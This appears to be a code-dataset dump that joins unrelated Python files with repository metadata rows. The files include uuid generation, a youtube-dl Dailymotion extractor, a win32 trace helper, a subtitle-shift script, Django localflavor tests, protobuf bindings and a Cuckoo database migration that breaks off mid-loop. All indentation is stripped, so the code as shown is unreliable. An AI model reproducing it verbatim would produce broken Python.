nanoseconds = int(time.time() * 1e9)
# 0x01b21dd213814000 is the number of 100-ns intervals between the
# UUID epoch 1582-10-15 00:00:00 and the Unix epoch 1970-01-01 00:00:00.
timestamp = int(nanoseconds / 100) + 0x01b21dd213814000L
if timestamp <= _last_timestamp:
timestamp = _last_timestamp + 1
_last_timestamp = timestamp
if clock_seq is None:
import random
clock_seq = random.randrange(1 << 14L) # instead of stable storage
time_low = timestamp & 0xffffffffL
time_mid = (timestamp >> 32L) & 0xffffL
time_hi_version = (timestamp >> 48L) & 0x0fffL
clock_seq_low = clock_seq & 0xffL
clock_seq_hi_variant = (clock_seq >> 8L) & 0x3fL
if node is None:
node = getnode()
return UUID(fields=(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node), version=1)
def uuid3(namespace, name):
"""Generate a UUID from the MD5 hash of a namespace UUID and a name."""
try:
from hashlib import md5
except ImportError:
from md5 import md5
hash = md5(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=3)
def uuid4():
"""Generate a random UUID."""
# When the system provides a version-4 UUID generator, use it.
if _uuid_generate_random:
_uuid_generate_random(_buffer)
return UUID(bytes=_buffer.raw)
# Otherwise, get randomness from urandom or the 'random' module.
try:
import os
return UUID(bytes=os.urandom(16), version=4)
except:
import random
bytes = [chr(random.randrange(256)) for i in range(16)]
return UUID(bytes=bytes, version=4)
def uuid5(namespace, name):
"""Generate a UUID from the SHA-1 hash of a namespace UUID and a name."""
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
hash = sha(namespace.bytes + name).digest()
return UUID(bytes=hash[:16], version=5)
# The following standard UUIDs are for use with uuid3() or uuid5().
NAMESPACE_DNS = UUID('6ba7b810-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_URL = UUID('6ba7b811-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_OID = UUID('6ba7b812-9dad-11d1-80b4-00c04fd430c8')
NAMESPACE_X500 = UUID('6ba7b814-9dad-11d1-80b4-00c04fd430c8')
| agpl-3.0 | -4,337,568,236,918,039,000 | 35.170213 | 79 | 0.6 | false |
vjmac15/Lyilis | lib/youtube_dl/extractor/dailymotion.py | 13 | 18180 | # coding: utf-8
from __future__ import unicode_literals
import re
import json
import itertools
from .common import InfoExtractor
from ..utils import (
determine_ext,
error_to_compat_str,
ExtractorError,
int_or_none,
parse_iso8601,
sanitized_Request,
str_to_int,
unescapeHTML,
mimetype2ext,
)
class DailymotionBaseInfoExtractor(InfoExtractor):
@staticmethod
def _build_request(url):
"""Build a request with the family filter disabled"""
request = sanitized_Request(url)
request.add_header('Cookie', 'family_filter=off; ff=off')
return request
def _download_webpage_handle_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage_handle(request, *args, **kwargs)
def _download_webpage_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage(request, *args, **kwargs)
class DailymotionIE(DailymotionBaseInfoExtractor):
_VALID_URL = r'(?i)https?://(?:(www|touch)\.)?dailymotion\.[a-z]{2,3}/(?:(?:(?:embed|swf|#)/)?video|swf)/(?P<id>[^/?_]+)'
IE_NAME = 'dailymotion'
_FORMATS = [
('stream_h264_ld_url', 'ld'),
('stream_h264_url', 'standard'),
('stream_h264_hq_url', 'hq'),
('stream_h264_hd_url', 'hd'),
('stream_h264_hd1080_url', 'hd180'),
]
_TESTS = [{
'url': 'http://www.dailymotion.com/video/x5kesuj_office-christmas-party-review-jason-bateman-olivia-munn-t-j-miller_news',
'md5': '074b95bdee76b9e3654137aee9c79dfe',
'info_dict': {
'id': 'x5kesuj',
'ext': 'mp4',
'title': 'Office Christmas Party Review – Jason Bateman, Olivia Munn, T.J. Miller',
'description': 'Office Christmas Party Review - Jason Bateman, Olivia Munn, T.J. Miller',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 187,
'timestamp': 1493651285,
'upload_date': '20170501',
'uploader': 'Deadline',
'uploader_id': 'x1xm8ri',
'age_limit': 0,
'view_count': int,
},
}, {
'url': 'https://www.dailymotion.com/video/x2iuewm_steam-machine-models-pricing-listed-on-steam-store-ign-news_videogames',
'md5': '2137c41a8e78554bb09225b8eb322406',
'info_dict': {
'id': 'x2iuewm',
'ext': 'mp4',
'title': 'Steam Machine Models, Pricing Listed on Steam Store - IGN News',
'description': 'Several come bundled with the Steam Controller.',
'thumbnail': r're:^https?:.*\.(?:jpg|png)$',
'duration': 74,
'timestamp': 1425657362,
'upload_date': '20150306',
'uploader': 'IGN',
'uploader_id': 'xijv66',
'age_limit': 0,
'view_count': int,
},
'skip': 'video gone',
}, {
# Vevo video
'url': 'http://www.dailymotion.com/video/x149uew_katy-perry-roar-official_musi',
'info_dict': {
'title': 'Roar (Official)',
'id': 'USUV71301934',
'ext': 'mp4',
'uploader': 'Katy Perry',
'upload_date': '20130905',
},
'params': {
'skip_download': True,
},
'skip': 'VEVO is only available in some countries',
}, {
# age-restricted video
'url': 'http://www.dailymotion.com/video/xyh2zz_leanna-decker-cyber-girl-of-the-year-desires-nude-playboy-plus_redband',
'md5': '0d667a7b9cebecc3c89ee93099c4159d',
'info_dict': {
'id': 'xyh2zz',
'ext': 'mp4',
'title': 'Leanna Decker - Cyber Girl Of The Year Desires Nude [Playboy Plus]',
'uploader': 'HotWaves1012',
'age_limit': 18,
},
'skip': 'video gone',
}, {
# geo-restricted, player v5
'url': 'http://www.dailymotion.com/video/xhza0o',
'only_matching': True,
}, {
# with subtitles
'url': 'http://www.dailymotion.com/video/x20su5f_the-power-of-nightmares-1-the-rise-of-the-politics-of-fear-bbc-2004_news',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/video/x3n92nf',
'only_matching': True,
}, {
'url': 'http://www.dailymotion.com/swf/x3ss1m_funny-magic-trick-barry-and-stuart_fun',
'only_matching': True,
}]
@staticmethod
def _extract_urls(webpage):
# Look for embedded Dailymotion player
matches = re.findall(
r'<(?:(?:embed|iframe)[^>]+?src=|input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=)(["\'])(?P<url>(?:https?:)?//(?:www\.)?dailymotion\.com/(?:embed|swf)/video/.+?)\1', webpage)
return list(map(lambda m: unescapeHTML(m[1]), matches))
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(
'https://www.dailymotion.com/video/%s' % video_id, video_id)
age_limit = self._rta_search(webpage)
description = self._og_search_description(webpage) or self._html_search_meta(
'description', webpage, 'description')
view_count_str = self._search_regex(
(r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserPlays:([\s\d,.]+)"',
r'video_views_count[^>]+>\s+([\s\d\,.]+)'),
webpage, 'view count', default=None)
if view_count_str:
view_count_str = re.sub(r'\s', '', view_count_str)
view_count = str_to_int(view_count_str)
comment_count = int_or_none(self._search_regex(
r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserComments:(\d+)"',
webpage, 'comment count', default=None))
player_v5 = self._search_regex(
[r'buildPlayer\(({.+?})\);\n', # See https://github.com/rg3/youtube-dl/issues/7826
r'playerV5\s*=\s*dmp\.create\([^,]+?,\s*({.+?})\);',
r'buildPlayer\(({.+?})\);',
r'var\s+config\s*=\s*({.+?});',
# New layout regex (see https://github.com/rg3/youtube-dl/issues/13580)
r'__PLAYER_CONFIG__\s*=\s*({.+?});'],
webpage, 'player v5', default=None)
if player_v5:
player = self._parse_json(player_v5, video_id)
metadata = player['metadata']
self._check_error(metadata)
formats = []
for quality, media_list in metadata['qualities'].items():
for media in media_list:
media_url = media.get('url')
if not media_url:
continue
type_ = media.get('type')
if type_ == 'application/vnd.lumberjack.manifest':
continue
ext = mimetype2ext(type_) or determine_ext(media_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', preference=-1,
m3u8_id='hls', fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
media_url, video_id, preference=-1, f4m_id='hds', fatal=False))
else:
f = {
'url': media_url,
'format_id': 'http-%s' % quality,
'ext': ext,
}
m = re.search(r'H264-(?P<width>\d+)x(?P<height>\d+)', media_url)
if m:
f.update({
'width': int(m.group('width')),
'height': int(m.group('height')),
})
formats.append(f)
self._sort_formats(formats)
title = metadata['title']
duration = int_or_none(metadata.get('duration'))
timestamp = int_or_none(metadata.get('created_time'))
thumbnail = metadata.get('poster_url')
uploader = metadata.get('owner', {}).get('screenname')
uploader_id = metadata.get('owner', {}).get('id')
subtitles = {}
subtitles_data = metadata.get('subtitles', {}).get('data', {})
if subtitles_data and isinstance(subtitles_data, dict):
for subtitle_lang, subtitle in subtitles_data.items():
subtitles[subtitle_lang] = [{
'ext': determine_ext(subtitle_url),
'url': subtitle_url,
} for subtitle_url in subtitle.get('urls', [])]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'timestamp': timestamp,
'uploader': uploader,
'uploader_id': uploader_id,
'age_limit': age_limit,
'view_count': view_count,
'comment_count': comment_count,
'formats': formats,
'subtitles': subtitles,
}
# vevo embed
vevo_id = self._search_regex(
r'<link rel="video_src" href="[^"]*?vevo.com[^"]*?video=(?P<id>[\w]*)',
webpage, 'vevo embed', default=None)
if vevo_id:
return self.url_result('vevo:%s' % vevo_id, 'Vevo')
# fallback old player
embed_page = self._download_webpage_no_ff(
'https://www.dailymotion.com/embed/video/%s' % video_id,
video_id, 'Downloading embed page')
timestamp = parse_iso8601(self._html_search_meta(
'video:release_date', webpage, 'upload date'))
info = self._parse_json(
self._search_regex(
r'var info = ({.*?}),$', embed_page,
'video info', flags=re.MULTILINE),
video_id)
self._check_error(info)
formats = []
for (key, format_id) in self._FORMATS:
video_url = info.get(key)
if video_url is not None:
m_size = re.search(r'H264-(\d+)x(\d+)', video_url)
if m_size is not None:
width, height = map(int_or_none, (m_size.group(1), m_size.group(2)))
else:
width, height = None, None
formats.append({
'url': video_url,
'ext': 'mp4',
'format_id': format_id,
'width': width,
'height': height,
})
self._sort_formats(formats)
# subtitles
video_subtitles = self.extract_subtitles(video_id, webpage)
title = self._og_search_title(webpage, default=None)
if title is None:
title = self._html_search_regex(
r'(?s)<span\s+id="video_title"[^>]*>(.*?)</span>', webpage,
'title')
return {
'id': video_id,
'formats': formats,
'uploader': info['owner.screenname'],
'timestamp': timestamp,
'title': title,
'description': description,
'subtitles': video_subtitles,
'thumbnail': info['thumbnail_url'],
'age_limit': age_limit,
'view_count': view_count,
'duration': info['duration']
}
def _check_error(self, info):
error = info.get('error')
if info.get('error') is not None:
title = error['title']
# See https://developer.dailymotion.com/api#access-error
if error.get('code') == 'DM007':
self.raise_geo_restricted(msg=title)
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, title), expected=True)
def _get_subtitles(self, video_id, webpage):
try:
sub_list = self._download_webpage(
'https://api.dailymotion.com/video/%s/subtitles?fields=id,language,url' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
info = json.loads(sub_list)
if (info['total'] > 0):
sub_lang_list = dict((l['language'], [{'url': l['url'], 'ext': 'srt'}]) for l in info['list'])
return sub_lang_list
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
class DailymotionPlaylistIE(DailymotionBaseInfoExtractor):
IE_NAME = 'dailymotion:playlist'
_VALID_URL = r'(?:https?://)?(?:www\.)?dailymotion\.[a-z]{2,3}/playlist/(?P<id>.+?)/'
_MORE_PAGES_INDICATOR = r'(?s)<div class="pages[^"]*">.*?<a\s+class="[^"]*?icon-arrow_right[^"]*?"'
_PAGE_TEMPLATE = 'https://www.dailymotion.com/playlist/%s/%s'
_TESTS = [{
'url': 'http://www.dailymotion.com/playlist/xv4bw_nqtv_sport/1#video=xl8v3q',
'info_dict': {
'title': 'SPORT',
'id': 'xv4bw_nqtv_sport',
},
'playlist_mincount': 20,
}]
def _extract_entries(self, id):
video_ids = set()
processed_urls = set()
for pagenum in itertools.count(1):
page_url = self._PAGE_TEMPLATE % (id, pagenum)
webpage, urlh = self._download_webpage_handle_no_ff(
page_url, id, 'Downloading page %s' % pagenum)
if urlh.geturl() in processed_urls:
self.report_warning('Stopped at duplicated page %s, which is the same as %s' % (
page_url, urlh.geturl()), id)
break
processed_urls.add(urlh.geturl())
for video_id in re.findall(r'data-xid="(.+?)"', webpage):
if video_id not in video_ids:
yield self.url_result(
'http://www.dailymotion.com/video/%s' % video_id,
DailymotionIE.ie_key(), video_id)
video_ids.add(video_id)
if re.search(self._MORE_PAGES_INDICATOR, webpage) is None:
break
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
webpage = self._download_webpage(url, playlist_id)
return {
'_type': 'playlist',
'id': playlist_id,
'title': self._og_search_title(webpage),
'entries': self._extract_entries(playlist_id),
}
class DailymotionUserIE(DailymotionPlaylistIE):
IE_NAME = 'dailymotion:user'
_VALID_URL = r'https?://(?:www\.)?dailymotion\.[a-z]{2,3}/(?!(?:embed|swf|#|video|playlist)/)(?:(?:old/)?user/)?(?P<user>[^/]+)'
_PAGE_TEMPLATE = 'http://www.dailymotion.com/user/%s/%s'
_TESTS = [{
'url': 'https://www.dailymotion.com/user/nqtv',
'info_dict': {
'id': 'nqtv',
'title': 'Rémi Gaillard',
},
'playlist_mincount': 100,
}, {
'url': 'http://www.dailymotion.com/user/UnderProject',
'info_dict': {
'id': 'UnderProject',
'title': 'UnderProject',
},
'playlist_mincount': 1800,
'expected_warnings': [
'Stopped at duplicated page',
],
'skip': 'Takes too long time',
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
user = mobj.group('user')
webpage = self._download_webpage(
'https://www.dailymotion.com/user/%s' % user, user)
full_user = unescapeHTML(self._html_search_regex(
r'<a class="nav-image" title="([^"]+)" href="/%s">' % re.escape(user),
webpage, 'user'))
return {
'_type': 'playlist',
'id': user,
'title': full_user,
'entries': self._extract_entries(user),
}
class DailymotionCloudIE(DailymotionBaseInfoExtractor):
_VALID_URL_PREFIX = r'https?://api\.dmcloud\.net/(?:player/)?embed/'
_VALID_URL = r'%s[^/]+/(?P<id>[^/?]+)' % _VALID_URL_PREFIX
_VALID_EMBED_URL = r'%s[^/]+/[^\'"]+' % _VALID_URL_PREFIX
_TESTS = [{
# From http://www.francetvinfo.fr/economie/entreprises/les-entreprises-familiales-le-secret-de-la-reussite_933271.html
# Tested at FranceTvInfo_2
'url': 'http://api.dmcloud.net/embed/4e7343f894a6f677b10006b4/556e03339473995ee145930c?auth=1464865870-0-jyhsm84b-ead4c701fb750cf9367bf4447167a3db&autoplay=1',
'only_matching': True,
}, {
# http://www.francetvinfo.fr/societe/larguez-les-amarres-le-cobaturage-se-developpe_980101.html
'url': 'http://api.dmcloud.net/player/embed/4e7343f894a6f677b10006b4/559545469473996d31429f06?auth=1467430263-0-90tglw2l-a3a4b64ed41efe48d7fccad85b8b8fda&autoplay=1',
'only_matching': True,
}]
@classmethod
def _extract_dmcloud_url(cls, webpage):
mobj = re.search(r'<iframe[^>]+src=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL, webpage)
if mobj:
return mobj.group(1)
mobj = re.search(
r'<input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=[\'"](%s)[\'"]' % cls._VALID_EMBED_URL,
webpage)
if mobj:
return mobj.group(1)
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(url, video_id)
title = self._html_search_regex(r'<title>([^>]+)</title>', webpage, 'title')
video_info = self._parse_json(self._search_regex(
r'var\s+info\s*=\s*([^;]+);', webpage, 'video info'), video_id)
# TODO: parse ios_url, which is in fact a manifest
video_url = video_info['mp4_url']
return {
'id': video_id,
'url': video_url,
'title': title,
'thumbnail': video_info.get('thumbnail_url'),
}
| gpl-3.0 | -8,468,256,538,332,842,000 | 38.174569 | 197 | 0.517302 | false |
chvrga/outdoor-explorer | java/play-1.4.4/python/Lib/site-packages/win32/lib/win32traceutil.py | 9 | 1528 | # This is a helper for the win32trace module
# If imported from a normal Python program, it sets up sys.stdout and sys.stderr
# so output goes to the collector.
# If run from the command line, it creates a collector loop.
# Eg:
# C:>start win32traceutil.py (or python.exe win32traceutil.py)
# will start a process with a (pretty much) blank screen.
#
# then, switch to a DOS prompt, and type:
# C:>python.exe
# Python 1.4 etc...
# >>> import win32traceutil
# Redirecting output to win32trace remote collector
# >>> print "Hello"
# >>>
# And the output will appear in the first collector process.
# Note - the client or the collector can be started first.
# There is a 0x20000 byte buffer. If this gets full, it is reset, and new
# output appended from the start.
import win32trace
def RunAsCollector():
import sys
try:
import win32api
win32api.SetConsoleTitle("Python Trace Collector")
except:
pass # Oh well!
win32trace.InitRead()
print "Collecting Python Trace Output..."
try:
while 1:
# a short timeout means ctrl+c works next time we wake...
sys.stdout.write(win32trace.blockingread(500))
except KeyboardInterrupt:
print "Ctrl+C"
def SetupForPrint():
win32trace.InitWrite()
try: # Under certain servers, sys.stdout may be invalid.
print "Redirecting output to win32trace remote collector"
except:
pass
win32trace.setprint() # this works in an rexec environment.
if __name__=='__main__':
RunAsCollector()
else:
SetupForPrint()
| mit | 2,440,878,280,362,501,000 | 25.781818 | 80 | 0.704188 | false |
hawken93/mplayerhq | TOOLS/vobshift.py | 71 | 1048 | #!/usr/bin/env python
#usage:
#
# vobshift.py in.idx out.idx -8.45
#
# this will read in in.idx,shift it by 8.45 seconds back,
# and save it as out.idx
#
# license: i don't care ;)
#
import datetime
import sys
def tripletize(line):
begin = line[:11]
middle = line[11:23]
end = line[23:]
return (begin,middle,end)
def text2delta(t):
h = int( t[0:2] )
m = int( t[3:5] )
s = int( t[6:8] )
milli = int( t[9:12] )
return datetime.timedelta(hours=h,minutes=m,seconds=s,milliseconds=milli)
def delta2text(d):
t = str(d)
milli = t[8:11]
if len(milli) == 0: #fix for .000 seconds
milli = '000'
return '0'+t[:7]+':'+milli
def shift(line,seconds):
triplet = tripletize(line)
base = text2delta(triplet[1])
base = base + datetime.timedelta(seconds=seconds)
base = delta2text(base)
return triplet[0]+base+triplet[2]
INFILE =sys.argv[1]
OUTFILE =sys.argv[2]
DIFF =float(sys.argv[3])
o = open(OUTFILE,'wt')
for line in open(INFILE):
if line.startswith('timestamp'):
line = shift(line,DIFF)
o.write(line)
o.close()
| gpl-2.0 | -4,942,677,992,306,953,000 | 17.068966 | 74 | 0.649809 | false |
aprefontaine/TMScheduler | tests/regressiontests/forms/localflavor/uy.py | 14 | 2014 | # -*- coding: utf-8 -*-
# Tests for the contrib/localflavor/ UY form fields.
tests = r"""
# UYDepartamentSelect #########################################################
>>> from django.contrib.localflavor.uy.forms import UYDepartamentSelect
>>> f = UYDepartamentSelect()
>>> f.render('departamentos', 'S')
u'<select name="departamentos">\n<option value="G">Artigas</option>\n<option value="A">Canelones</option>\n<option value="E">Cerro Largo</option>\n<option value="L">Colonia</option>\n<option value="Q">Durazno</option>\n<option value="N">Flores</option>\n<option value="O">Florida</option>\n<option value="P">Lavalleja</option>\n<option value="B">Maldonado</option>\n<option value="S" selected="selected">Montevideo</option>\n<option value="I">Paysand\xfa</option>\n<option value="J">R\xedo Negro</option>\n<option value="F">Rivera</option>\n<option value="C">Rocha</option>\n<option value="H">Salto</option>\n<option value="M">San Jos\xe9</option>\n<option value="K">Soriano</option>\n<option value="R">Tacuaremb\xf3</option>\n<option value="D">Treinta y Tres</option>\n</select>'
# UYCIField ###################################################################
>>> from django.contrib.localflavor.uy.util import get_validation_digit
>>> get_validation_digit(409805) == 3
True
>>> get_validation_digit(1005411) == 2
True
>>> from django.contrib.localflavor.uy.forms import UYCIField
>>> f = UYCIField()
>>> f.clean('4098053')
u'4098053'
>>> f.clean('409805-3')
u'409805-3'
>>> f.clean('409.805-3')
u'409.805-3'
>>> f.clean('10054112')
u'10054112'
>>> f.clean('1005411-2')
u'1005411-2'
>>> f.clean('1.005.411-2')
u'1.005.411-2'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number in X.XXX.XXX-X,XXXXXXX-X or XXXXXXXX format.']
>>> f.clean('409805-2')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
>>> f.clean('1.005.411-5')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid CI number.']
"""
| bsd-3-clause | 3,891,448,946,487,106,000 | 42.782609 | 780 | 0.653426 | false |
earshel/PokeyPyManager | POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage_pb2.py | 16 | 4749 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos.Enums import Platform_pb2 as POGOProtos_dot_Enums_dot_Platform__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\nPPOGOProtos/Networking/Requests/Messages/DownloadRemoteConfigVersionMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\x1a\x1fPOGOProtos/Enums/Platform.proto\"\xaa\x01\n\"DownloadRemoteConfigVersionMessage\x12,\n\x08platform\x18\x01 \x01(\x0e\x32\x1a.POGOProtos.Enums.Platform\x12\x1b\n\x13\x64\x65vice_manufacturer\x18\x02 \x01(\t\x12\x14\n\x0c\x64\x65vice_model\x18\x03 \x01(\t\x12\x0e\n\x06locale\x18\x04 \x01(\t\x12\x13\n\x0b\x61pp_version\x18\x05 \x01(\rb\x06proto3')
,
dependencies=[POGOProtos_dot_Enums_dot_Platform__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE = _descriptor.Descriptor(
name='DownloadRemoteConfigVersionMessage',
full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='platform', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.platform', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_manufacturer', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_manufacturer', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='device_model', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.device_model', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='locale', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.locale', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='app_version', full_name='POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage.app_version', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=159,
serialized_end=329,
)
_DOWNLOADREMOTECONFIGVERSIONMESSAGE.fields_by_name['platform'].enum_type = POGOProtos_dot_Enums_dot_Platform__pb2._PLATFORM
DESCRIPTOR.message_types_by_name['DownloadRemoteConfigVersionMessage'] = _DOWNLOADREMOTECONFIGVERSIONMESSAGE
DownloadRemoteConfigVersionMessage = _reflection.GeneratedProtocolMessageType('DownloadRemoteConfigVersionMessage', (_message.Message,), dict(
DESCRIPTOR = _DOWNLOADREMOTECONFIGVERSIONMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.DownloadRemoteConfigVersionMessage)
))
_sym_db.RegisterMessage(DownloadRemoteConfigVersionMessage)
# @@protoc_insertion_point(module_scope)
| mit | 4,457,933,379,265,750,500 | 46.49 | 502 | 0.761845 | false |
chubbymaggie/CuckooSploit | utils/db_migration/versions/from_0_6_to_1_1.py | 6 | 14422 | # Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Database migration from Cuckoo 0.6 to Cuckoo 1.1.
Revision ID: 263a45963c72
Revises: None
Create Date: 2014-03-23 23:30:36.756792
"""
# Revision identifiers, used by Alembic.
revision = "263a45963c72"
mongo_revision = "1"
down_revision = None
import os
import sys
import sqlalchemy as sa
from datetime import datetime
try:
from dateutil.parser import parse
except ImportError:
print "Unable to import dateutil.parser",
print "(install with `pip install python-dateutil`)"
sys.exit()
try:
from alembic import op
except ImportError:
print "Unable to import alembic (install with `pip install alembic`)"
sys.exit()
try:
from pymongo.connection import Connection
from pymongo.errors import ConnectionFailure
except ImportError:
print "Unable to import pymongo (install with `pip install pymongo`)"
sys.exit()
sys.path.append(os.path.join("..", ".."))
import lib.cuckoo.core.database as db
from lib.cuckoo.common.config import Config
def upgrade():
# BEWARE: be prepared to really spaghetti code. To deal with SQLite limitations in Alembic we coded some workarounds.
# Migrations are supported starting form Cuckoo 0.6 and Cuckoo 1.0; I need a way to figure out if from which release
# it will start because both schema are missing alembic release versioning.
# I check for tags table to distinguish between Cuckoo 0.6 and 1.0.
conn = op.get_bind()
if conn.engine.dialect.has_table(conn.engine.connect(), "machines_tags"):
# If this table exist we are on Cuckoo 1.0 or above.
# So skip SQL migration.
pass
else:
# We are on Cuckoo < 1.0, hopefully 0.6.
# So run SQL migration.
# Create table used by Tag.
op.create_table(
"tags",
sa.Column("id", sa.Integer(), primary_key=True),
sa.Column("name", sa.String(length=255), nullable=False, unique=True),
)
# Create secondary table used in association Machine - Tag.
op.create_table(
"machines_tags",
sa.Column("machine_id", sa.Integer, sa.ForeignKey("machines.id")),
sa.Column("tag_id", sa.Integer, sa.ForeignKey("tags.id")),
)
# Add columns to Machine.
op.add_column("machines", sa.Column("interface", sa.String(length=255), nullable=True))
op.add_column("machines", sa.Column("snapshot", sa.String(length=255), nullable=True))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_ip", sa.String(length=255), server_default="192.168.56.1", nullable=False))
# TODO: change default value, be aware sqlite doesn't support that kind of ALTER statement.
op.add_column("machines", sa.Column("resultserver_port", sa.String(length=255), server_default="2042", nullable=False))
# Deal with Alembic shit.
# Alembic is so ORMish that it was impossible to write code which works on different DBMS.
if conn.engine.driver == "psycopg2":
# We don"t provide a default value and leave the column as nullable because o further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True)
# Altering status ENUM.
# This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type.
op.execute('COMMIT') # Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction.
conn.execute("ALTER TYPE status_type ADD VALUE 'completed'")
conn.execute("ALTER TYPE status_type ADD VALUE 'reported'")
conn.execute("ALTER TYPE status_type ADD VALUE 'recovered'")
conn.execute("ALTER TYPE status_type ADD VALUE 'running'")
conn.execute("ALTER TYPE status_type RENAME ATTRIBUTE success TO completed")
conn.execute("ALTER TYPE status_type DROP ATTRIBUTE IF EXISTS failure")
elif conn.engine.driver == "mysqldb":
# We don"t provide a default value and leave the column as nullable because o further data migration.
op.add_column("tasks", sa.Column("clock", sa.DateTime(timezone=False),nullable=True))
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
conn.execute("update tasks set clock=added_on")
# Add the not null constraint.
op.alter_column("tasks", "clock", nullable=False, existing_nullable=True, existing_type=sa.DateTime(timezone=False))
# NOTE: To workaround limitations in Alembic and MySQL ALTER statement (cannot remove item from ENUM).
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
